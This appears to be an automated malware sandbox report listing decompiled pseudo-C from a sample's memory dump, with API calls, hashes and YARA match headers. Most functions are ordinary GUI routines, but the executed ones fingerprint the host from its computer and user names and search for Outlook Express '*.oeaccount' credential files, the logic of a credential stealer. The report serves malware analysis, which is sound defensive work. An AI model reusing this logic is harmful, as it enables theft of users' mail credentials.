                                                                        • API String ID: 3291753422-2766056989
                                                                        • Opcode ID: b9d5a125bf218a009a68829a8c95d56b8c1c78d079be63f4ef73db18c465e3ad
                                                                        • Instruction ID: 4b7c01e8749ac2bd4959e066d72cd119708752121d29ea447919de7842c2e686
                                                                        • Opcode Fuzzy Hash: b9d5a125bf218a009a68829a8c95d56b8c1c78d079be63f4ef73db18c465e3ad
                                                                        • Instruction Fuzzy Hash: 1B1106716042486BCB01DA6CC885BDFBBEC9F49318F044292FC04EB342CB79DD448794
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 42%
                                                                        			E004717DC(char __edx, void* __edi, void* __esi) {
                                                                        				char _v5;
                                                                        				void* __ebx;
                                                                        				void* __ecx;
                                                                        				void* __ebp;
                                                                        				void* _t12;
                                                                        				signed int _t21;
                                                                        				signed int _t22;
                                                                        				signed int _t25;
                                                                        				void* _t28;
                                                                        				void* _t31;
                                                                        				void* _t32;
                                                                        				char _t33;
                                                                        				signed int _t37;
                                                                        				void* _t39;
                                                                        				void* _t40;
                                                                        				void* _t41;
                                                                        				void* _t42;
                                                                        
                                                                        				_t40 = __esi;
                                                                        				_t39 = __edi;
                                                                        				_t33 = __edx;
                                                                        				if(__edx != 0) {
                                                                        					_t42 = _t42 + 0xfffffff0;
                                                                        					_t12 = E00403940(_t12, _t41);
                                                                        				}
                                                                        				_v5 = _t33;
                                                                        				_t31 = _t12;
                                                                        				E00438AC4(_t31, _t32, 0, _t39, _t40);
                                                                        				E00435D68(_t31, GetSystemMetrics(2));
                                                                        				E00435D8C(_t31, GetSystemMetrics(0x14));
                                                                        				_t21 =  *(_t31 + 0x4c);
                                                                        				_t37 = _t21;
                                                                        				_t22 = _t21 >> 1;
                                                                        				if(0 < 0) {
                                                                        					asm("adc eax, 0x0");
                                                                        				}
                                                                        				E00435D8C(_t31, _t37 + _t22);
                                                                        				 *((char*)(_t31 + 0x208)) = 1;
                                                                        				 *((short*)(_t31 + 0x212)) = 0x64;
                                                                        				 *((intOrPtr*)(_t31 + 0x214)) = 1;
                                                                        				 *((char*)(_t31 + 0x228)) = 1;
                                                                        				 *((char*)(_t31 + 0x229)) = 1;
                                                                        				 *((char*)(_t31 + 0x21e)) = 1;
                                                                        				_t25 =  *0x47188c; // 0x80
                                                                        				 *(_t31 + 0x50) =  !_t25 &  *(_t31 + 0x50);
                                                                        				_t28 = _t31;
                                                                        				if(_v5 != 0) {
                                                                        					E00403998(_t28);
                                                                        					_pop( *[fs:0x0]);
                                                                        				}
                                                                        				return _t31;
                                                                        			}





















                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.749503743.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000002.00000002.749483060.0000000000400000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749763098.000000000047A000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749779338.000000000047B000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749823728.0000000000495000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749839062.0000000000496000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749850256.000000000049C000.00000002.00020000.sdmp Download File
                                                                        Similarity
                                                                        • API ID: MetricsSystem
                                                                        • String ID: d
                                                                        • API String ID: 4116985748-2564639436
                                                                        • Opcode ID: 19e6b5c28e468764134af8d16d4fbe5a215d9376d4effbce3a1d784a4ddeab67
                                                                        • Instruction ID: 0b87a267c4685935d203ee5a8c4fb54ab077512866400b8bfe7b889297467223
                                                                        • Opcode Fuzzy Hash: 19e6b5c28e468764134af8d16d4fbe5a215d9376d4effbce3a1d784a4ddeab67
                                                                        • Instruction Fuzzy Hash: 351182717443409BE700EF7D98CA3857AD05B1530CF0890BDEC488F397DABE95488369
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 68%
                                                                        			E004274B0(intOrPtr _a4, intOrPtr _a8, signed int _a12) {
                                                                        				void* __ebx;
                                                                        				void* __edi;
                                                                        				void* __esi;
                                                                        				void* __ebp;
                                                                        				void* _t15;
                                                                        				void* _t16;
                                                                        				intOrPtr _t18;
                                                                        				signed int _t19;
                                                                        				void* _t20;
                                                                        				intOrPtr _t21;
                                                                        
                                                                        				_t19 = _a12;
                                                                        				if( *0x496ac7 != 0) {
                                                                        					_t16 = 0;
                                                                        					if((_t19 & 0x00000003) != 0) {
                                                                        						L7:
                                                                        						_t16 = 0x12340042;
                                                                        					} else {
                                                                        						_t21 = _a4;
                                                                        						if(_t21 >= 0 && _t21 < GetSystemMetrics(0) && _a8 >= 0 && GetSystemMetrics(1) > _a8) {
                                                                        							goto L7;
                                                                        						}
                                                                        					}
                                                                        				} else {
                                                                        					_t18 =  *0x496aa8; // 0x4274b0
                                                                        					 *0x496aa8 = E00427218(3, _t15, _t18, _t19, _t20);
                                                                        					_t16 =  *0x496aa8(_a4, _a8, _t19);
                                                                        				}
                                                                        				return _t16;
                                                                        			}














                                                                        APIs
                                                                        • GetSystemMetrics.USER32 ref: 004274FE
                                                                        • GetSystemMetrics.USER32 ref: 00427510
                                                                          • Part of subcall function 00427218: GetProcAddress.KERNEL32(745C0000,00000000), ref: 00427298
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.749503743.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000002.00000002.749483060.0000000000400000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749763098.000000000047A000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749779338.000000000047B000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749823728.0000000000495000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749839062.0000000000496000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749850256.000000000049C000.00000002.00020000.sdmp Download File
                                                                        Similarity
                                                                        • API ID: MetricsSystem$AddressProc
                                                                        • String ID: MonitorFromPoint
                                                                        • API String ID: 1792783759-1072306578
                                                                        • Opcode ID: f7ecf0ea672574d08a9988f9cecea0da0792823a781f49fc23c9cb090435b35f
                                                                        • Instruction ID: 0ca1a078767922ccf2f9ab2b13178130f2d88d21fff11c5ab282216ea325be36
                                                                        • Opcode Fuzzy Hash: f7ecf0ea672574d08a9988f9cecea0da0792823a781f49fc23c9cb090435b35f
                                                                        • Instruction Fuzzy Hash: 0201A232309224BFDB004F55FC84B5ABB55EB55364FD18037FA09ABA11D779DC818BA8
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 72%
                                                                        			E0043E63C(void* __eax, char __ecx, struct HWND__* __edx, void* __eflags, char _a4) {
                                                                        				char _v8;
                                                                        				char _v12;
                                                                        				char _v16;
                                                                        				int* _t22;
                                                                        				void* _t28;
                                                                        
                                                                        				_v8 = __ecx;
                                                                        				_t28 = __eax;
                                                                        				_t22 = 0;
                                                                        				if(E00443514(__eax) != 0) {
                                                                        					_t32 = __edx -  *((intOrPtr*)(_t28 + 0x6c));
                                                                        					if(__edx !=  *((intOrPtr*)(_t28 + 0x6c))) {
                                                                        						E0043E6A0(_t28, _t32);
                                                                        						 *((intOrPtr*)(_t28 + 0x6c)) = __edx;
                                                                        						_t5 =  &_a4; // 0x434668
                                                                        						E0043E42C(__edx,  *_t5, _v8,  &_v16);
                                                                        						_t7 =  &_v12; // 0x434668
                                                                        						_push( *_t7);
                                                                        						_push(_v16);
                                                                        						_push( *((intOrPtr*)(_t28 + 0x6c)));
                                                                        						L00426B08();
                                                                        						asm("sbb ebx, ebx");
                                                                        						_t22 =  &(__edx->i);
                                                                        					}
                                                                        				}
                                                                        				return _t22;
                                                                        			}









                                                                        APIs
                                                                          • Part of subcall function 0043E6A0: 734518F0.COMCTL32(?,00000000,0043E665,00000000,00000000,00000000), ref: 0043E6B8
                                                                          • Part of subcall function 0043E42C: ClientToScreen.USER32(?,C), ref: 0043E444
                                                                          • Part of subcall function 0043E42C: GetWindowRect.USER32 ref: 0043E44E
                                                                        • 73451850.COMCTL32(?,?,hFC,?,00000000,00000000,00000000), ref: 0043E687
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.749503743.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000002.00000002.749483060.0000000000400000.00000002.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749763098.000000000047A000.00000004.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749779338.000000000047B000.00000008.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749823728.0000000000495000.00000008.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749839062.0000000000496000.00000004.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749850256.000000000049C000.00000002.00020000.sdmp
                                                                        Similarity
                                                                        • API ID: 73451873451850ClientRectScreenWindow
                                                                        • String ID: hFC$hFC
                                                                        • API String ID: 1718620977-3271904332
                                                                        • Opcode ID: 8eed95cc1c404b6fc45a057da765cb1baadc94690517fec50dbe15e3b690cb91
                                                                        • Instruction ID: 83cfaa479dfe381d88bbdac577f0f16f2725ff20e945c221232cd3b5c31a28e6
                                                                        • Opcode Fuzzy Hash: 8eed95cc1c404b6fc45a057da765cb1baadc94690517fec50dbe15e3b690cb91
                                                                        • Instruction Fuzzy Hash: D9F06277B012096B8B10DE9E98C189EF7ACEB4C224B54817BF518D3341D635EE148794
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 68%
                                                                        			E00427388(intOrPtr* _a4, signed int _a8) {
                                                                        				void* __ebx;
                                                                        				void* __edi;
                                                                        				void* __esi;
                                                                        				void* __ebp;
                                                                        				intOrPtr* _t14;
                                                                        				intOrPtr _t16;
                                                                        				signed int _t17;
                                                                        				void* _t18;
                                                                        				void* _t19;
                                                                        
                                                                        				_t17 = _a8;
                                                                        				_t14 = _a4;
                                                                        				if( *0x496ac6 != 0) {
                                                                        					_t19 = 0;
                                                                        					if((_t17 & 0x00000003) != 0 ||  *((intOrPtr*)(_t14 + 8)) > 0 &&  *((intOrPtr*)(_t14 + 0xc)) > 0 && GetSystemMetrics(0) >  *_t14 && GetSystemMetrics(1) >  *((intOrPtr*)(_t14 + 4))) {
                                                                        						_t19 = 0x12340042;
                                                                        					}
                                                                        				} else {
                                                                        					_t16 =  *0x496aa4; // 0x427388
                                                                        					 *0x496aa4 = E00427218(2, _t14, _t16, _t17, _t18);
                                                                        					_t19 =  *0x496aa4(_t14, _t17);
                                                                        				}
                                                                        				return _t19;
                                                                        			}













                                                                        APIs
                                                                        • GetSystemMetrics.USER32 ref: 004273D9
                                                                        • GetSystemMetrics.USER32 ref: 004273E5
                                                                          • Part of subcall function 00427218: GetProcAddress.KERNEL32(745C0000,00000000), ref: 00427298
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.749503743.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000002.00000002.749483060.0000000000400000.00000002.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749763098.000000000047A000.00000004.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749779338.000000000047B000.00000008.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749823728.0000000000495000.00000008.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749839062.0000000000496000.00000004.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749850256.000000000049C000.00000002.00020000.sdmp
                                                                        Similarity
                                                                        • API ID: MetricsSystem$AddressProc
                                                                        • String ID: MonitorFromRect
                                                                        • API String ID: 1792783759-4033241945
                                                                        • Opcode ID: 853a7fc467a0f53b6e0ee6d63dab54201dbae885feac652f51bdea48347bc6ca
                                                                        • Instruction ID: f4212cdc0bcdd90a97bb4186d0bbb8f5baa078fbbc89cb2f22bd8dfda28a6ed8
                                                                        • Opcode Fuzzy Hash: 853a7fc467a0f53b6e0ee6d63dab54201dbae885feac652f51bdea48347bc6ca
                                                                        • Instruction Fuzzy Hash: D4017C323081249BDB20CB64E985716BB59EB52390F958067EC05EB612C6B8DC40DBA9
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E00462F50(void* __eax) {
                                                                        				void* __ebp;
                                                                        				char _t7;
                                                                        				char _t8;
                                                                        				struct HINSTANCE__* _t12;
                                                                        				void* _t15;
                                                                        				signed int _t16;
                                                                        				void* _t19;
                                                                        				CHAR** _t20;
                                                                        
                                                                        				_t19 = __eax;
                                                                        				_t7 =  *0x462fb0; // 0x0
                                                                        				 *((char*)(__eax + 0x2b8)) = _t7;
                                                                        				_t8 =  *0x462fb0; // 0x0
                                                                        				 *((char*)(__eax + 0x2b9)) = _t8;
                                                                        				_t16 = 0;
                                                                        				_t20 = 0x47ac24;
                                                                        				do {
                                                                        					 *((intOrPtr*)(_t19 + 0x2bc + _t16 * 4)) = E004242CC(1);
                                                                        					_t12 =  *0x496714; // 0x400000
                                                                        					_t15 = E00425494(_t10, LoadBitmapA(_t12,  *_t20));
                                                                        					_t16 = _t16 + 1;
                                                                        					_t20 =  &(_t20[1]);
                                                                        				} while (_t16 != 5);
                                                                        				return _t15;
                                                                        			}












                                                                        APIs
                                                                        • LoadBitmapA.USER32 ref: 00462F91
                                                                          • Part of subcall function 00425494: GetObjectA.GDI32(?,00000054,?), ref: 004254CE
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.749503743.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000002.00000002.749483060.0000000000400000.00000002.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749763098.000000000047A000.00000004.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749779338.000000000047B000.00000008.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749823728.0000000000495000.00000008.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749839062.0000000000496000.00000004.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749850256.000000000049C000.00000002.00020000.sdmp
                                                                        Similarity
                                                                        • API ID: BitmapLoadObject
                                                                        • String ID: DA$d-F
                                                                        • API String ID: 4240920667-4117158572
                                                                        • Opcode ID: 8d380a7cc6438939fa926292fecba264169c2880adfe122f86d8d0340b6fd245
                                                                        • Instruction ID: d86268dc89174e040b3bdf134327d5a64c67eb724b5f3c86b08247b70b8e43d5
                                                                        • Opcode Fuzzy Hash: 8d380a7cc6438939fa926292fecba264169c2880adfe122f86d8d0340b6fd245
                                                                        • Instruction Fuzzy Hash: 95F0E2257042906FC2009FAEADC0986FBA8E749215751017BE948C7322C6696841977D
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E0044692C(void* __eax) {
                                                                        				void* _t16;
                                                                        				intOrPtr _t17;
                                                                        
                                                                        				_t16 = __eax;
                                                                        				if( *((intOrPtr*)(__eax + 0x34)) == 0) {
                                                                        					_t17 =  *0x445600; // 0x44564c
                                                                        					if(E00403768( *((intOrPtr*)(__eax + 4)), _t17) == 0) {
                                                                        						 *((intOrPtr*)(_t16 + 0x34)) = CreateMenu();
                                                                        					} else {
                                                                        						 *((intOrPtr*)(_t16 + 0x34)) = CreatePopupMenu();
                                                                        					}
                                                                        					if( *((intOrPtr*)(_t16 + 0x34)) == 0) {
                                                                        						E004459E0();
                                                                        					}
                                                                        					E004466C8(_t16);
                                                                        				}
                                                                        				return  *((intOrPtr*)(_t16 + 0x34));
                                                                        			}






                                                                        APIs
                                                                        • CreatePopupMenu.USER32(?,0044663F,00000000,00000000,00446683), ref: 00446947
                                                                        • CreateMenu.USER32(?,0044663F,00000000,00000000,00446683), ref: 00446951
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.749503743.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000002.00000002.749483060.0000000000400000.00000002.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749763098.000000000047A000.00000004.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749779338.000000000047B000.00000008.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749823728.0000000000495000.00000008.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749839062.0000000000496000.00000004.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749850256.000000000049C000.00000002.00020000.sdmp
                                                                        Similarity
                                                                        • API ID: CreateMenu$Popup
                                                                        • String ID: LVD
                                                                        • API String ID: 257293969-462541549
                                                                        • Opcode ID: d9d0badce4ef86591aa20f7282ffbf1034a79afcf9c0626e2ed873ef2ebc2a63
                                                                        • Instruction ID: 06d8af0e65ff4525c3f7fd11a64e48488f021198afdba98e41057e88a90e2ea7
                                                                        • Opcode Fuzzy Hash: d9d0badce4ef86591aa20f7282ffbf1034a79afcf9c0626e2ed873ef2ebc2a63
                                                                        • Instruction Fuzzy Hash: B4E0C9B0202200DBEF50FF65D5C16053BA4AB05319F92647FA8455B257C678D8858B1A
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 58%
                                                                        			E00433790(intOrPtr __eax) {
                                                                        				intOrPtr _t5;
                                                                        				intOrPtr _t10;
                                                                        				intOrPtr _t11;
                                                                        
                                                                        				_t10 = __eax;
                                                                        				ReleaseCapture();
                                                                        				_t5 = 0;
                                                                        				 *0x47a96c = 0;
                                                                        				if(_t10 != 0) {
                                                                        					_t11 =  *0x4323f0; // 0x43243c
                                                                        					_t5 = E00403768(_t10, _t11);
                                                                        					if(0 != 0) {
                                                                        						L4:
                                                                        						return SetCapture(E0043CC2C(_t10));
                                                                        					}
                                                                        					if( *((intOrPtr*)(_t10 + 0x30)) != 0) {
                                                                        						 *0x47a96c = _t10;
                                                                        						_t10 =  *((intOrPtr*)(_t10 + 0x30));
                                                                        						goto L4;
                                                                        					}
                                                                        				}
                                                                        				return _t5;
                                                                        			}







                                                                        APIs
                                                                        • ReleaseCapture.USER32(00000000,00436809,0000FFB8,?,0045FE8A), ref: 00433793
                                                                        • SetCapture.USER32(00000000,00000000,00436809,0000FFB8,?,0045FE8A), ref: 004337CB
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.749503743.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000002.00000002.749483060.0000000000400000.00000002.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749763098.000000000047A000.00000004.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749779338.000000000047B000.00000008.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749823728.0000000000495000.00000008.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749839062.0000000000496000.00000004.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749850256.000000000049C000.00000002.00020000.sdmp
                                                                        Similarity
                                                                        • API ID: Capture$Release
                                                                        • String ID: <$C
                                                                        • API String ID: 1520983071-3423417450
                                                                        • Opcode ID: 069273d8fa48293c893d9ce74b54af7ed5dc040ff898934071bb15314ed0582d
                                                                        • Instruction ID: f69f079f5be23d6e1fa85a04827f5d80959cc3868215f43c1aed832baa5a6738
                                                                        • Opcode Fuzzy Hash: 069273d8fa48293c893d9ce74b54af7ed5dc040ff898934071bb15314ed0582d
                                                                        • Instruction Fuzzy Hash: 33E046F070030087DB10AF7A98C16073298BB4C306F44A87FAD08AB393C77CD995CA59
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 87%
                                                                        			E00434370(struct tagPOINT* __eax) {
                                                                        				struct HWND__* _t8;
                                                                        				void* _t9;
                                                                        
                                                                        				_push(__eax->y);
                                                                        				_t8 = WindowFromPoint( *__eax);
                                                                        				if(_t8 != 0) {
                                                                        					while(E00434328(_t8, _t9) == 0) {
                                                                        						_t8 = GetParent(_t8);
                                                                        						if(_t8 != 0) {
                                                                        							continue;
                                                                        						}
                                                                        						goto L3;
                                                                        					}
                                                                        				}
                                                                        				L3:
                                                                        				return _t8;
                                                                        			}





                                                                        APIs
                                                                        • WindowFromPoint.USER32(YBC,?,00000000,00433F52,?,-0000000C,?), ref: 00434376
                                                                          • Part of subcall function 00434328: GlobalFindAtomA.KERNEL32 ref: 0043433C
                                                                          • Part of subcall function 00434328: GetPropA.USER32 ref: 00434353
                                                                        • GetParent.USER32(00000000), ref: 0043438D
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.749503743.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000002.00000002.749483060.0000000000400000.00000002.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749763098.000000000047A000.00000004.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749779338.000000000047B000.00000008.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749823728.0000000000495000.00000008.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749839062.0000000000496000.00000004.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749850256.000000000049C000.00000002.00020000.sdmp
                                                                        Similarity
                                                                        • API ID: AtomFindFromGlobalParentPointPropWindow
                                                                        • String ID: YBC
                                                                        • API String ID: 3524704154-2981556608
                                                                        • Opcode ID: 97dfd7ec3a7724f91f9af8ce4d5fb9e7f174329956de61e1e1a8bb4ec22f11bd
                                                                        • Instruction ID: 7a30522fa15226b405c8248a6cc35b0061ab833cb262d2683d9bbae8bf9d1630
                                                                        • Opcode Fuzzy Hash: 97dfd7ec3a7724f91f9af8ce4d5fb9e7f174329956de61e1e1a8bb4ec22f11bd
                                                                        • Instruction Fuzzy Hash: 62D0C7513003035B9F152AF65DC195A664C9FAD349B02247EBD415B623DE6DDC19531C
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Executed Functions

                                                                        C-Code - Quality: 100%
                                                                        			E0040724C(signed int _a4) {
                                                                        				char _v5;
                                                                        				char _v6;
                                                                        				char _v7;
                                                                        				char _v8;
                                                                        				char _v9;
                                                                        				char _v10;
                                                                        				char _v11;
                                                                        				char _v12;
                                                                        				char _v13;
                                                                        				char _v14;
                                                                        				char _v15;
                                                                        				char _v16;
                                                                        				char _v17;
                                                                        				char _v18;
                                                                        				char _v19;
                                                                        				void _v20;
                                                                        				long _v24;
                                                                        				int _v28;
                                                                        				int _v32;
                                                                        				void* _v36;
                                                                        				void _v291;
                                                                        				char _v292;
                                                                        				void _v547;
                                                                        				char _v548;
                                                                        				void _v1058;
                                                                        				short _v1060;
                                                                        				void _v1570;
                                                                        				short _v1572;
                                                                        				int _t88;
                                                                        				signed int _t91;
                                                                        				signed int _t92;
                                                                        				signed int _t94;
                                                                        				signed int _t96;
                                                                        				signed int _t99;
                                                                        				signed int _t104;
                                                                        				signed short* _t110;
                                                                        				void* _t113;
                                                                        				void* _t114;
                                                                        
                                                                        				_t92 = 0;
                                                                        				_v20 = 0xa3;
                                                                        				_v19 = 0x1e;
                                                                        				_v18 = 0xf3;
                                                                        				_v17 = 0x69;
                                                                        				_v16 = 7;
                                                                        				_v15 = 0x62;
                                                                        				_v14 = 0xd9;
                                                                        				_v13 = 0x1f;
                                                                        				_v12 = 0x1e;
                                                                        				_v11 = 0xe9;
                                                                        				_v10 = 0x35;
                                                                        				_v9 = 0x7d;
                                                                        				_v8 = 0x4f;
                                                                        				_v7 = 0xd2;
                                                                        				_v6 = 0x7d;
                                                                        				_v5 = 0x48;
                                                                        				_v292 = 0;
                                                                        				memset( &_v291, 0, 0xff);
                                                                        				_v548 = 0;
                                                                        				memset( &_v547, 0, 0xff);
                                                                        				_v1572 = 0;
                                                                        				memset( &_v1570, 0, 0x1fe);
                                                                        				_v1060 = 0;
                                                                        				memset( &_v1058, 0, 0x1fe);
                                                                        				_v36 = _a4 + 4;
                                                                        				_a4 = 0;
                                                                        				_v24 = 0xff;
                                                                        				GetComputerNameA( &_v292,  &_v24); // executed
                                                                        				_v24 = 0xff;
                                                                        				GetUserNameA( &_v548,  &_v24); // executed
                                                                        				MultiByteToWideChar(0, 0,  &_v292, 0xffffffff,  &_v1572, 0xff);
                                                                        				MultiByteToWideChar(0, 0,  &_v548, 0xffffffff,  &_v1060, 0xff);
                                                                        				_v32 = strlen( &_v292);
                                                                        				_t88 = strlen( &_v548);
                                                                        				_t113 = _v36;
                                                                        				_v28 = _t88;
                                                                        				memcpy(_t113,  &_v20, 0x10);
                                                                        				_t91 = 0xba0da71d;
                                                                        				if(_v28 > 0) {
                                                                        					_t110 =  &_v1060;
                                                                        					do {
                                                                        						_t104 = _a4 & 0x80000003;
                                                                        						if(_t104 < 0) {
                                                                        							_t104 = (_t104 - 0x00000001 | 0xfffffffc) + 1;
                                                                        						}
                                                                        						_t96 = ( *_t110 & 0x0000ffff) * _t91;
                                                                        						_t91 = _t91 * 0xbc8f;
                                                                        						 *(_t113 + _t104 * 4) =  *(_t113 + _t104 * 4) ^ _t96;
                                                                        						_a4 = _a4 + 1;
                                                                        						_t110 =  &(_t110[1]);
                                                                        					} while (_a4 < _v28);
                                                                        				}
                                                                        				if(_v32 > _t92) {
                                                                        					do {
                                                                        						_t99 = _a4 & 0x80000003;
                                                                        						if(_t99 < 0) {
                                                                        							_t99 = (_t99 - 0x00000001 | 0xfffffffc) + 1;
                                                                        						}
                                                                        						_t94 = ( *(_t114 + _t92 * 2 - 0x620) & 0x0000ffff) * _t91;
                                                                        						_t91 = _t91 * 0xbc8f;
                                                                        						 *(_t113 + _t99 * 4) =  *(_t113 + _t99 * 4) ^ _t94;
                                                                        						_a4 = _a4 + 1;
                                                                        						_t92 = _t92 + 1;
                                                                        					} while (_t92 < _v32);
                                                                        				}
                                                                        				return _t91;
                                                                        			}









































                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.692418330.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000005.00000002.692538060.0000000000418000.00000040.00000001.sdmp
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: memset$ByteCharMultiNameWidestrlen$ComputerUsermemcpy
                                                                        • String ID: 5$H$O$b$i$}$}
                                                                        • API String ID: 1832431107-3760989150
                                                                        • Opcode ID: 892f1d25977d50633ddef969ddbe2b4ff3cde350e5ee45bf306cc9825cca91de
                                                                        • Instruction ID: 8a8033fc9206e0c4c361a826d49ab5f0cafd1e40d7200dcd25d3d532c5214641
                                                                        • Opcode Fuzzy Hash: 892f1d25977d50633ddef969ddbe2b4ff3cde350e5ee45bf306cc9825cca91de
                                                                        • Instruction Fuzzy Hash: AC510871C0025DBEDB11CBA8CC41AEEBBBDEF49314F0442EAE955E6191D3389B84CB65
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E00406EC3(void** __eax) {
                                                                        				void* __esi;
                                                                        				void* _t15;
                                                                        				int _t16;
                                                                        				int _t17;
                                                                        				void* _t26;
                                                                        				void** _t38;
                                                                        				void** _t40;
                                                                        				void* _t45;
                                                                        
                                                                        				_t40 = __eax;
                                                                        				_t15 =  *__eax;
                                                                        				if(_t15 != 0xffffffff) {
                                                                        					_t16 = FindNextFileA(_t15,  &(__eax[0x52])); // executed
                                                                        					 *(_t45 + 4) = _t16;
                                                                        					if(_t16 != 0) {
                                                                        						goto L5;
                                                                        					} else {
                                                                        						E00406F5B(_t40);
                                                                        						goto L4;
                                                                        					}
                                                                        				} else {
                                                                        					_t26 = FindFirstFileA( &(__eax[1]),  &(__eax[0x52])); // executed
                                                                        					 *_t40 = _t26;
                                                                        					 *(_t45 + 4) = 0 | _t26 != 0xffffffff;
                                                                        					L4:
                                                                        					if( *(_t45 + 4) != 0) {
                                                                        						L5:
                                                                        						_t38 =  &(_t40[0xa2]);
                                                                        						_t28 =  &(_t40[0x5d]);
                                                                        						_t41 =  &(_t40[0xf3]);
                                                                        						_t17 = strlen( &(_t40[0xf3]));
                                                                        						if(strlen( &(_t40[0x5d])) + _t17 + 1 >= 0x143) {
                                                                        							 *_t38 = 0;
                                                                        						} else {
                                                                        							E004062AD(_t38, _t41, _t28);
                                                                        						}
                                                                        					}
                                                                        				}
                                                                        				return  *(_t45 + 4);
                                                                        			}











                                                                        APIs
                                                                        • FindFirstFileA.KERNELBASE(?,?,?,?,00410CA1,*.oeaccount,rA,?,00000104), ref: 00406ED9
                                                                        • FindNextFileA.KERNELBASE(?,?,?,?,00410CA1,*.oeaccount,rA,?,00000104), ref: 00406EF7
                                                                        • strlen.MSVCRT ref: 00406F27
                                                                        • strlen.MSVCRT ref: 00406F2F
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.692418330.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000005.00000002.692538060.0000000000418000.00000040.00000001.sdmp
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: FileFindstrlen$FirstNext
                                                                        • String ID: rA
                                                                        • API String ID: 379999529-474049127
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 97%
                                                                        			E00401E8B(void* __eflags, char* _a4) {
                                                                        				signed int _v8;
                                                                        				int _v12;
                                                                        				void _v275;
                                                                        				char _v276;
                                                                        				void _v539;
                                                                        				char _v540;
                                                                        				void _v795;
                                                                        				char _v796;
                                                                        				void _v1059;
                                                                        				char _v1060;
                                                                        				void _v1323;
                                                                        				char _v1324;
                                                                        				void _v2347;
